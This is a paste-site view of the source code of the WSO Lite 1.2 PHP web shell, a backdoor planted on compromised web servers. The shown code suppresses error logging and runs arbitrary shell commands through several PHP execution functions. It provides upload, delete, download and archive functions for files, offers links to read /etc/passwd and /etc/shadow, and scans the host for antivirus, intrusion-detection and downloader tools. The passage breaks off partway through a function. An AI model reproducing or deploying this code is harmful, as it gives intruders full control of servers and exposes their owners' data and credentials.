View difference between Paste ID: SXiHkz0K and rsMZkqfb
1
<?php 
2
$color = "#df5"; 
3
$default_action = 'FilesMan'; 
4
$default_use_ajax = true; 
5
$default_charset = 'Windows-1251';  
6
  
7
@session_start(); 
8
@ini_set('error_log',NULL); 
9
@ini_set('log_errors',0); 
10
@ini_set('max_execution_time',0); 
11
@set_time_limit(0); 
12
@set_magic_quotes_runtime(0); 
13
@define('WSO_VERSION', 'Lite 1.2'); 
14
  
15
if(get_magic_quotes_gpc()) { 
16
    function WSOstripslashes($array) { 
17
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); 
18
    } 
19
    $_POST = WSOstripslashes($_POST); 
20
}
21
  
22
if(strtolower(substr(PHP_OS,0,3)) == "win") 
23
    $os = 'win'; 
24
else
25
    $os = 'nix'; 
26
  
27
$safe_mode = @ini_get('safe_mode'); 
28
if(!$safe_mode) 
29
    error_reporting(0); 
30
  
31
$disable_functions = @ini_get('disable_functions'); 
32
$home_cwd = @getcwd(); 
33
if(isset($_POST['c'])) 
34
    @chdir($_POST['c']); 
35
$cwd = @getcwd(); 
36
if($os == 'win') { 
37
    $home_cwd = str_replace("\\", "/", $home_cwd); 
38
    $cwd = str_replace("\\", "/", $cwd); 
39
} 
40
if($cwd[strlen($cwd)-1] != '/' ) 
41
    $cwd .= '/';  
42
      
43
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) 
44
    $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; 
45
  
46
function wsoHeader() { 
47
    if(empty($_POST['charset'])) 
48
        $_POST['charset'] = $GLOBALS['default_charset']; 
49
    global $color; 
50
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>WSO " . WSO_VERSION ."</title> 
51
<style> 
52
body{background-color:#444;color:#e1e1e1;}  
53
body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}  
54
table.info{color:#fff;background-color:#222;}
55
span,h1,a{color: $color !important;}  
56
span{font-weight: bolder;}  
57
h1{border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}
58
div.content{padding: 5px;margin-left:5px;background-color:#333;}  
59
a{text-decoration:none;}  
60
a:hover{text-decoration:underline;}
61
.ml1{border:1px solid #444;padding:5px;margin:0;overflow: auto;}  
62
.bigarea{width:100%;height:300px;}
63
input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New';}  
64
form{margin:0px;}  
65
#toolsTbl{text-align:center;}  
66
.toolsInp{width: 80%;}  
67
.main th{text-align:left;background-color:#5e5e5e;}  
68
.main tr:hover{background-color:#5e5e5e}  
69
.main td, th{vertical-align:middle}  
70
.l1{background-color:#444}
71
pre{font-family:Courier,Monospace} 
72
</style> 
73
<script> 
74
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; 
75
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
76
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; 
77
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; 
78
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; 
79
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; 
80
    var d = document; 
81
    function set(a,c,p1,p2,p3,charset) { 
82
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; 
83
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; 
84
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; 
85
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; 
86
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; 
87
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; 
88
    } 
89
    function g(a,c,p1,p2,p3,charset) { 
90
        set(a,c,p1,p2,p3,charset); 
91
        d.mf.submit(); 
92
    } 
93
    function a(a,c,p1,p2,p3,charset) { 
94
        set(a,c,p1,p2,p3,charset); 
95
        var params = 'ajax=true'; 
96
        for(i=0;i<d.mf.elements.length;i++) 
97
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); 
98
        sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); 
99
    } 
100
    function sr(url, params) { 
101
        if (window.XMLHttpRequest) 
102
            req = new XMLHttpRequest(); 
103
        else if (window.ActiveXObject) 
104
            req = new ActiveXObject('Microsoft.XMLHTTP'); 
105
        if (req) { 
106
            req.onreadystatechange = processReqChange; 
107
            req.open('POST', url, true); 
108
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); 
109
            req.send(params); 
110
        } 
111
    } 
112
    function processReqChange() { 
113
        if( (req.readyState == 4) ) 
114
            if(req.status == 200) { 
115
                var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); 
116
                var arr=reg.exec(req.responseText); 
117
                eval(arr[2].substr(0, arr[1])); 
118
            } else alert('Request error!'); 
119
    } 
120
</script> 
121
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> 
122
<form method=post name=mf style='display:none;'> 
123
<input type=hidden name=a> 
124
<input type=hidden name=c> 
125
<input type=hidden name=p1> 
126
<input type=hidden name=p2> 
127
<input type=hidden name=p3> 
128
<input type=hidden name=charset> 
129
</form>"; 
130
    $freeSpace = @diskfreespace($GLOBALS['cwd']); 
131
    $totalSpace = @disk_total_space($GLOBALS['cwd']); 
132
    $totalSpace = $totalSpace?$totalSpace:1; 
133
    $release = @php_uname('r'); 
134
    $kernel = @php_uname('s'); 
135
    if(!function_exists('posix_getegid')) { 
136
        $user = @get_current_user(); 
137
        $uid = @getmyuid(); 
138
        $gid = @getmygid(); 
139
        $group = "?"; 
140
    } else { 
141
        $uid = @posix_getpwuid(posix_geteuid()); 
142
        $gid = @posix_getgrgid(posix_getegid()); 
143
        $user = $uid['name']; 
144
        $uid = $uid['uid']; 
145
        $group = $gid['name']; 
146
        $gid = $gid['gid']; 
147
    } 
148
  
149
    $cwd_links = ''; 
150
    $path = explode("/", $GLOBALS['cwd']); 
151
    $n=count($path); 
152
    for($i=0; $i<$n-1; $i++) { 
153
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; 
154
        for($j=0; $j<=$i; $j++) 
155
            $cwd_links .= $path[$j].'/'; 
156
        $cwd_links .= "\")'>".$path[$i]."/</a>"; 
157
    } 
158
  
159
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
160
    $opt_charsets = ''; 
161
    foreach($charsets as $item) 
162
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; 
163
  
164
    $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','Network'=>'Network'); 
165
    $menu = ''; 
166
    foreach($m as $k => $v) 
167
        $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>'; 
168
  
169
    $drives = ""; 
170
    if($GLOBALS['os'] == 'win') { 
171
        foreach(range('c','z') as $drive) 
172
        if(is_dir($drive.':\\')) 
173
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; 
174
    } 
175
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
176
       . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') 
177
       . '<span> Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
178
       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
179
       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; 
180
} 
181
  
182
function wsoFooter() { 
183
    $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; 
184
    echo " 
185
</div> 
186
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'> 
187
    <tr> 
188
        <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> 
189
        <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> 
190
    </tr><tr> 
191
        <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> 
192
        <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> 
193
    </tr><tr> 
194
        <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> 
195
        <td><form method='post' ENCTYPE='multipart/form-data'> 
196
        <input type=hidden name=a value='FilesMAn'> 
197
        <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> 
198
        <input type=hidden name=p1 value='uploadFile'> 
199
        <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> 
200
        <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td> 
201
  
202
    </tr></table></div></body></html>"; 
203
} 
204
  
205
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { 
206
    function posix_getpwuid($p) {return false;} } 
207
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { 
208
    function posix_getgrgid($p) {return false;} } 
209
  
210
function wsoEx($in) { 
211
    $out = ''; 
212
    if (function_exists('exec')) { 
213
        @exec($in,$out); 
214
        $out = @join("\n",$out); 
215
    } elseif (function_exists('passthru')) { 
216
        ob_start(); 
217
        @passthru($in); 
218
        $out = ob_get_clean(); 
219
    } elseif (function_exists('system')) { 
220
        ob_start(); 
221
        @system($in); 
222
        $out = ob_get_clean(); 
223
    } elseif (function_exists('shell_exec')) { 
224
        $out = shell_exec($in); 
225
    } elseif (is_resource($f = @popen($in,"r"))) { 
226
        $out = ""; 
227
        while(!@feof($f)) 
228
            $out .= fread($f,1024); 
229
        pclose($f); 
230
    } 
231
    return $out; 
232
} 
233
function wsoViewSize($s) { 
234
    if($s >= 1073741824) 
235
        return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
236
    elseif($s >= 1048576) 
237
        return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
238
    elseif($s >= 1024) 
239
        return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
240
    else
241
        return $s . ' B'; 
242
} 
243
  
244
function wsoPerms($p) { 
245
    if (($p & 0xC000) == 0xC000)$i = 's'; 
246
    elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
247
    elseif (($p & 0x8000) == 0x8000)$i = '-'; 
248
    elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
249
    elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
250
    elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
251
    elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
252
    else $i = 'u'; 
253
    $i .= (($p & 0x0100) ? 'r' : '-'); 
254
    $i .= (($p & 0x0080) ? 'w' : '-'); 
255
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
256
    $i .= (($p & 0x0020) ? 'r' : '-'); 
257
    $i .= (($p & 0x0010) ? 'w' : '-'); 
258
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
259
    $i .= (($p & 0x0004) ? 'r' : '-'); 
260
    $i .= (($p & 0x0002) ? 'w' : '-'); 
261
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
262
    return $i; 
263
} 
264
  
265
function wsoPermsColor($f) { 
266
    if (!@is_readable($f)) 
267
        return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; 
268
    elseif (!@is_writable($f)) 
269
        return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; 
270
    else
271
        return '<font color=green>' . wsoPerms(@fileperms($f)) . '</font>'; 
272
} 
273
  
274
if(!function_exists("scandir")) { 
275
    function scandir($dir) { 
276
        $dh  = opendir($dir); 
277
        while (false !== ($filename = readdir($dh))) 
278
            $files[] = $filename; 
279
        return $files; 
280
    } 
281
} 
282
  
283
function wsoWhich($p) { 
284
    $path = wsoEx('which ' . $p); 
285
    if(!empty($path)) 
286
        return $path; 
287
    return false; 
288
} 
289
  
290
function actionSecInfo() { 
291
    wsoHeader(); 
292
    echo '<h1>Server security information</h1><div class=content>'; 
293
    function wsoSecParam($n, $v) { 
294
        $v = trim($v); 
295
        if($v) { 
296
            echo '<span>' . $n . ': </span>'; 
297
            if(strpos($v, "\n") === false) 
298
                echo $v . '<br>'; 
299
            else
300
                echo '<pre class=ml1>' . $v . '</pre>'; 
301
        } 
302
    } 
303
  
304
    wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
305
    if(function_exists('apache_get_modules')) 
306
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); 
307
    wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); 
308
    wsoSecParam('Open base dir', @ini_get('open_basedir')); 
309
    wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
310
    wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
311
    wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
312
    $temp=array(); 
313
    if(function_exists('mysql_get_client_info')) 
314
        $temp[] = "MySql (".mysql_get_client_info().")"; 
315
    if(function_exists('mssql_connect')) 
316
        $temp[] = "MSSQL"; 
317
    if(function_exists('pg_connect')) 
318
        $temp[] = "PostgreSQL"; 
319
    if(function_exists('oci_connect')) 
320
        $temp[] = "Oracle"; 
321
    wsoSecParam('Supported databases', implode(', ', $temp)); 
322
    echo '<br>'; 
323
  
324
    if($GLOBALS['os'] == 'nix') { 
325
        wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); 
326
        wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); 
327
        wsoSecParam('OS version', @file_get_contents('/proc/version')); 
328
        wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
329
        if(!$GLOBALS['safe_mode']) { 
330
            $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
331
            $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
332
            $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
333
            echo '<br>'; 
334
            $temp=array(); 
335
            foreach ($userful as $item) 
336
                if(wsoWhich($item)) 
337
                    $temp[] = $item; 
338
            wsoSecParam('Userful', implode(', ',$temp)); 
339
            $temp=array(); 
340
            foreach ($danger as $item) 
341
                if(wsoWhich($item)) 
342
                    $temp[] = $item; 
343
            wsoSecParam('Danger', implode(', ',$temp)); 
344
            $temp=array(); 
345
            foreach ($downloaders as $item) 
346
                if(wsoWhich($item)) 
347
                    $temp[] = $item; 
348
            wsoSecParam('Downloaders', implode(', ',$temp)); 
349
            echo '<br/>'; 
350
            wsoSecParam('HDD space', wsoEx('df -h')); 
351
            wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); 
352
        } 
353
    } else { 
354
        wsoSecParam('OS Version',wsoEx('ver')); 
355
        wsoSecParam('Account Settings',wsoEx('net accounts')); 
356
        wsoSecParam('User Accounts',wsoEx('net user')); 
357
    } 
358
    echo '</div>'; 
359
    wsoFooter(); 
360
} 
361
  
362
function actionFilesMan() { 
363
    wsoHeader(); 
364
    echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; 
365
    if(!empty($_POST['p1'])) { 
366
        switch($_POST['p1']) { 
367
            case 'uploadFile': 
368
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
369
                    echo "Can't upload file!"; 
370
                break; 
371
            case 'mkdir': 
372
                if(!@mkdir($_POST['p2'])) 
373
                    echo "Can't create new dir"; 
374
                break; 
375
            case 'delete': 
376
                function deleteDir($path) { 
377
                    $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
378
                    $dh  = opendir($path); 
379
                    while ( ($item = readdir($dh) ) !== false) { 
380
                        $item = $path.$item; 
381
                        if ( (basename($item) == "..") || (basename($item) == ".") ) 
382
                            continue; 
383
                        $type = filetype($item); 
384
                        if ($type == "dir") 
385
                            deleteDir($item); 
386
                        else
387
                            @unlink($item); 
388
                    } 
389
                    closedir($dh); 
390
                    @rmdir($path); 
391
                } 
392
                if(is_array(@$_POST['f'])) 
393
                    foreach($_POST['f'] as $f) { 
394
                        if($f == '..') 
395
                            continue; 
396
                        $f = urldecode($f); 
397
                        if(is_dir($f)) 
398
                            deleteDir($f); 
399
                        else
400
                            @unlink($f); 
401
                    } 
402
                break; 
403
            case 'paste': 
404
                if($_SESSION['act'] == 'copy') { 
405
                    function copy_paste($c,$s,$d){ 
406
                        if(is_dir($c.$s)){ 
407
                            mkdir($d.$s); 
408
                            $h = @opendir($c.$s); 
409
                            while (($f = @readdir($h)) !== false) 
410
                                if (($f != ".") and ($f != "..")) 
411
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
412
                        } elseif(is_file($c.$s)) 
413
                            @copy($c.$s, $d.$s); 
414
                    } 
415
                    foreach($_SESSION['f'] as $f) 
416
                        copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); 
417
                } elseif($_SESSION['act'] == 'move') { 
418
                    function move_paste($c,$s,$d){ 
419
                        if(is_dir($c.$s)){ 
420
                            mkdir($d.$s); 
421
                            $h = @opendir($c.$s); 
422
                            while (($f = @readdir($h)) !== false) 
423
                                if (($f != ".") and ($f != "..")) 
424
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
425
                        } elseif(@is_file($c.$s)) 
426
                            @copy($c.$s, $d.$s); 
427
                    } 
428
                    foreach($_SESSION['f'] as $f) 
429
                        @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); 
430
                } elseif($_SESSION['act'] == 'zip') { 
431
                    if(class_exists('ZipArchive')) { 
432
                        $zip = new ZipArchive(); 
433
                        if ($zip->open($_POST['p2'], 1)) { 
434
                            chdir($_SESSION['c']); 
435
                            foreach($_SESSION['f'] as $f) { 
436
                                if($f == '..') 
437
                                    continue; 
438
                                if(@is_file($_SESSION['c'].$f)) 
439
                                    $zip->addFile($_SESSION['c'].$f, $f); 
440
                                elseif(@is_dir($_SESSION['c'].$f)) { 
441
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); 
442
                                    foreach ($iterator as $key=>$value) { 
443
                                        $zip->addFile(realpath($key), $key); 
444
                                    } 
445
                                } 
446
                            } 
447
                            chdir($GLOBALS['cwd']); 
448
                            $zip->close(); 
449
                        } 
450
                    } 
451
                } elseif($_SESSION['act'] == 'unzip') { 
452
                    if(class_exists('ZipArchive')) { 
453
                        $zip = new ZipArchive(); 
454
                        foreach($_SESSION['f'] as $f) { 
455
                            if($zip->open($_SESSION['c'].$f)) { 
456
                                $zip->extractTo($GLOBALS['cwd']); 
457
                                $zip->close(); 
458
                            } 
459
                        } 
460
                    } 
461
                } elseif($_SESSION['act'] == 'tar') { 
462
                    chdir($_SESSION['c']); 
463
                    $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']); 
464
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f'])); 
465
                    chdir($GLOBALS['cwd']); 
466
                } 
467
                unset($_SESSION['f']); 
468
                break; 
469
            default: 
470
                if(!empty($_POST['p1'])) { 
471
                    $_SESSION['act'] = @$_POST['p1']; 
472
                    $_SESSION['f'] = @$_POST['f']; 
473
                    foreach($_SESSION['f'] as $k => $f) 
474
                        $_SESSION['f'][$k] = urldecode($f); 
475
                    $_SESSION['c'] = @$_POST['c']; 
476
                } 
477
                break; 
478
        } 
479
    } 
480
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
481
    if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } 
482
    global $sort; 
483
    $sort = array('name', 1); 
484
    if(!empty($_POST['p1'])) { 
485
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
486
            $sort = array($match[1], (int)$match[2]); 
487
    } 
488
echo "<script> 
489
    function sa() { 
490
        for(i=0;i<d.files.elements.length;i++) 
491
            if(d.files.elements[i].type == 'checkbox') 
492
                d.files.elements[i].checked = d.files.elements[0].checked; 
493
    } 
494
  
495
</script> 
496
<table width='100%' class='main' cellspacing='0' cellpadding='2'> 
497
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; 
498
    $dirs = $files = array(); 
499
    $n = count($dirContent); 
500
    for($i=0;$i<$n;$i++) { 
501
        $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
502
        $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
503
        $tmp = array('name' => $dirContent[$i], 
504
                     'path' => $GLOBALS['cwd'].$dirContent[$i], 
505
                     'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 
506
                     'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 
507
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
508
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
509
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
510
                    ); 
511
        if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) 
512
            $files[] = array_merge($tmp, array('type' => 'file')); 
513
        elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) 
514
            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); 
515
        elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) 
516
            $dirs[] = array_merge($tmp, array('type' => 'dir')); 
517
    } 
518
    $GLOBALS['sort'] = $sort; 
519
    function wsoCmp($a, $b) { 
520
        if($GLOBALS['sort'][0] != 'size') 
521
            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); 
522
        else
523
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 
524
    } 
525
    usort($files, "wsoCmp"); 
526
    usort($dirs, "wsoCmp"); 
527
    $files = array_merge($dirs, $files); 
528
    $l = 0; 
529
    foreach($files as $f) { 
530
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] 
531
            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; 
532
        $l = $l?0:1; 
533
    } 
534
    echo "<tr><td colspan=7> 
535
  
536
    <input type=hidden name=a value='FilesMan'> 
537
    <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> 
538
    <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> 
539
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; 
540
    if(class_exists('ZipArchive')) 
541
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; 
542
    echo "<option value='tar'>Compress (tar.gz)</option>"; 
543
    if(!empty($_SESSION['act']) && @count($_SESSION['f'])) 
544
        echo "<option value='paste'>Paste / Compress</option>"; 
545
    echo "</select>&nbsp;"; 
546
    if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar'))) 
547
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;"; 
548
    echo "<input type='submit' value='>>'></td></tr></form></table></div>"; 
549
    wsoFooter(); 
550
} 
551
552
function actionFilesTools() { 
553
    if( isset($_POST['p1']) ) 
554
        $_POST['p1'] = urldecode($_POST['p1']); 
555
    if(@$_POST['p2']=='download') { 
556
        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { 
557
            ob_start("ob_gzhandler", 4096); 
558
            header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 
559
            if (function_exists("mime_content_type")) { 
560
                $type = @mime_content_type($_POST['p1']); 
561
                header("Content-Type: " . $type); 
562
            } else
563
                header("Content-Type: application/octet-stream"); 
564
            $fp = @fopen($_POST['p1'], "r"); 
565
            if($fp) { 
566
                while(!@feof($fp)) 
567
                    echo @fread($fp, 1024); 
568
                fclose($fp); 
569
            } 
570
        }exit; 
571
    } 
572
    if( @$_POST['p2'] == 'mkfile' ) { 
573
        if(!file_exists($_POST['p1'])) { 
574
            $fp = @fopen($_POST['p1'], 'w'); 
575
            if($fp) { 
576
                $_POST['p2'] = "edit"; 
577
                fclose($fp); 
578
            } 
579
        } 
580
    } 
581
    wsoHeader(); 
582
    echo '<h1>File tools</h1><div class=content>'; 
583
    if( !file_exists(@$_POST['p1']) ) { 
584
        echo 'File not exists'; 
585
        wsoFooter(); 
586
        return; 
587
    } 
588
    $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 
589
    if(!$uid) { 
590
        $uid['name'] = @fileowner($_POST['p1']); 
591
        $gid['name'] = @filegroup($_POST['p1']); 
592
    } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); 
593
    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; 
594
